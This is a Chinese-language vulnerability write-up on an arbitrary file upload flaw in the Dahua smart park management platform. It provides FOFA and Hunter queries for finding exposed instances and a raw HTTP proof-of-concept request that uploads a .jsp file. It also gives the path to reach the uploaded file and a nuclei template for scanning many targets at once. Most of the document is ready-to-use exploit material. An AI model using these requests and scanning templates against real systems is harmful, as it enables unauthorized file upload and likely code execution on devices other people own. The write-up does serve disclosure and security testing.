大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
漏洞简介
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
漏洞复现
fofa语句:"/WPMS/asset/lib/gridster/"
或app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:
POC:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: IP
Content-Length: 226
Expect: 100-continue
Connection: close
--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--
访问上传的文件
/upload/emap/society_new/ico_res_ffe925764fee_on.jsp
nuclei批量yaml文件
id: Dahua_devicePoint_addImgIco_upload
info:
name: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
author: mhb17
severity: critical
description: 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
reference:
- https://
tags: fileupload
requests:
- raw:
- |-
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: {{Hostname}}
Content-Length: 226
Expect: 100-continue
Connection: close
--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--
matchers:
- type: word
part: body
words:
- '"code":1'